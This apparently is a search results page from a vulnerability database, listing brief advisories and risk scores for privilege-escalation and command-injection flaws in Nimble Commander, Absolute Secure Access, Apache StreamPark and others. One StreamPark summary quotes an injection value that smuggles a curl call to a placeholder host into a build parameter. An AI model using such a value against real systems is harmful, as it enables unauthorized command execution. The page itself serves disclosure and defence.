832 matches found

Vulnrichment
added 2024/07/26 11:26 a.m. | 27 views

CVE-2024-7062 Local Privilege Escalation in Nimble Commander <= v1.6.0, Build 4087

Nimble Commander suffers from a privilege escalation vulnerability due to the server info.filesmanager.Files.PrivilegedIOHelperV2 performing improper/insufficient validation of a client’s authorization before executing an operation. Consequently, it is possible to execute system-level commands as...

8.8 CVSS | 7.8 AI score | 0.00246 EPSS
Exploits: 1 | References: 1
CVE
added 2024/07/26 11:26 a.m. | 73 views

CVE-2024-7062

CVE-2024-7062 affects Nimble Commander. The vulnerability is located in the server component info.filesmanager.Files.PrivilegedIOHelperV2 and arises from improper/insufficient validation of a client’s authorization before executing an operation. As described in the connected documents, this can e...

8.8 CVSS | 9.2 AI score | 0.00246 EPSS
Exploits: 1 | References: 1 | Affected Software: 1
NVD
added 2024/07/25 5:15 p.m. | 17 views

CVE-2024-40872

There is an elevation of privilege vulnerability in server and client components of Absolute Secure Access prior to version 13.07. Attackers with local access and valid desktop user credentials can elevate their privilege to system level by passing invalid address data to the vulnerable component...

8.4 CVSS | 0.00156 EPSS
Exploits: 0 | References: 1
Vulnrichment
added 2024/07/25 5:0 p.m. | 15 views

CVE-2024-40872 Elevation of privilege in Absolute Secure Access clients and servers

There is an elevation of privilege vulnerability in server and client components of Absolute Secure Access prior to version 13.07. Attackers with local access and valid desktop user credentials can elevate their privilege to system level by passing invalid address data to the vulnerable component...

8.4 CVSS | 6.7 AI score | 0.00156 EPSS
Exploits: 0 | References: 1
Cvelist
added 2024/07/25 5:0 p.m. | 39 views

CVE-2024-40872 Elevation of privilege in Absolute Secure Access clients and servers

There is an elevation of privilege vulnerability in server and client components of Absolute Secure Access prior to version 13.07. Attackers with local access and valid desktop user credentials can elevate their privilege to system level by passing invalid address data to the vulnerable component...

8.4 CVSS | 0.00156 EPSS
Exploits: 0 | References: 1
CVE
added 2024/07/25 5:0 p.m. | 46 views

CVE-2024-40872

CVE-2024-40872 describes an elevation-of-privilege flaw in Absolute Secure Access, affecting server and client components before version 13.07. Attackers with local access and valid desktop credentials can pass invalid address data to a vulnerable component to manipulate tokens and elevate a norm...

8.4 CVSS | 8.2 AI score | 0.00156 EPSS
Exploits: 0 | References: 1
Positive Technologies
added 2024/07/25 12:0 a.m. | 3 views

PT-2024-29123 · Unknown · Absolute Secure Access

Name of the Vulnerable Software and Affected Versions: Absolute Secure Access versions prior to 13.07

Description: The issue is related to an elevation of privilege vulnerability in server and client components. Attackers with local access and valid desktop user credentials can elevate their...

8.4 CVSS | 7 AI score | 0.00156 EPSS
Exploits: 0 | References: 4
Veracode
added 2024/07/18 5:38 a.m. | 15 views

Command Injection

org.apache.streampark:streampark is vulnerable to Command Injection. The vulnerability is caused due to insufficient input parameter validation, allowing attackers to insert commands. Exploiting this requires system-level access via user login, thereby limiting its risk due to controlled user...

8.8 CVSS | 7.3 AI score | 0.01607 EPSS
Exploits: 0 | References: 2 | Affected Software: 1
OSV
added 2024/07/17 9:30 a.m. | 9 views

GHSA-5V69-92VW-FMJH Apache StreamPark: maven build params could trigger remote command execution

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the streampark system and...

4.7 CVSS | 5.3 AI score | 0.01117 EPSS
Exploits: 0 | References: 4
OSV
added 2024/07/17 9:15 a.m. | 20 views

CVE-2024-29737

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the streampark system and...

4.7 CVSS | 5.2 AI score
Exploits: 0 | References: 2
NVD
added 2024/07/17 9:15 a.m. | 15 views

CVE-2024-29737

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the streampark system and...

8.8 CVSS | 0.01117 EPSS
Exploits: 0 | References: 2
NVD
added 2024/07/17 9:15 a.m. | 48 views

CVE-2023-52291

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the streampark system and...

8.8 CVSS | 0.01607 EPSS
Exploits: 0 | References: 2
Cvelist
added 2024/07/17 8:21 a.m. | 24 views

CVE-2024-29737 Apache StreamPark (incubating): maven build params could trigger remote command execution

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the streampark system and...

0.01117 EPSS
Exploits: 0 | References: 2
CVE
added 2024/07/17 8:21 a.m. | 65 views

CVE-2024-29737

CVE-2024-29737 concerns a command-injection flaw in Apache StreamPark (Project module). The vulnerability arises from lax validation of build parameters in the Maven integration, allowing an authenticated user with system-level permissions to inject commands via the Build Argument (demonstrated b...

8.8 CVSS | 5.2 AI score | 0.01117 EPSS
Exploits: 0 | References: 2 | Affected Software: 1
Cvelist
added 2024/07/17 8:16 a.m. | 32 views

CVE-2023-52291 Apache StreamPark (incubating): Unchecked maven build params could trigger remote command execution

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the streampark system and...

0.01607 EPSS
Exploits: 0 | References: 2
CVE
added 2024/07/17 8:16 a.m. | 73 views

CVE-2023-52291

CVE-2023-52291 concerns Apache StreamPark. The vulnerability stems from lax validation of maven build parameters in the StreamPark project module, allowing command injection when the input parameter < is used (for example, < (curl http://xxx.com)). An attack requires the user to be logged i...

8.8 CVSS | 5.2 AI score | 0.01607 EPSS
Exploits: 0 | References: 2 | Affected Software: 1
Veracode
added 2024/07/10 7:26 a.m. | 27 views

Privilege Escalation

Microsoft.IO.Redist is vulnerable to Privilege Escalation. The vulnerability is due to improper link resolution in the Visual Studio installer on Windows OS that allows an unprivileged user to manipulate the installation, leading to elevated SYSTEM level privileges...

7.3 CVSS | 6.5 AI score | 0.01292 EPSS
Exploits: 0 | References: 2 | Affected Software: 3
BDU FSTEC
added 2024/07/10 12:0 a.m. | 5 views

The vulnerability of the Windows Hyper-V hardware virtualization system allows attackers to escalate their privileges.

The vulnerability of the Windows Hyper-V hardware virtualization system is related to a numerical overflow condition. Exploiting this vulnerability can allow an attacker to elevate their privileges to the SYSTEM level...

7.8 CVSS | 5.8 AI score | 0.07115 EPSS
Exploits: 0 | References: 3
CNNVD
added 2024/06/27 12:0 a.m. | 12 views

SoftMaker Office Permission License and Access Control Issues Vulnerability

SoftMaker Office is a multi-platform office software suite from SoftMaker, a German company. The software is used for word processing, spreadsheets, and presentation design, can also be scripted, and supports a variety of common Office file formats, as well as a variety of internal formats th...

5.3 CVSS | 6.7 AI score | 0.00322 EPSS
Exploits: 1 | References: 5
Rockylinux
added 2024/06/14 1:59 p.m. | 33 views

pcp security update

An update is available for pcp. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. Performance Co-Pilot (PCP) is a suite of tools, services, and libraries for...

8.8 CVSS | 7.2 AI score | 0.01002 EPSS
Exploits: 0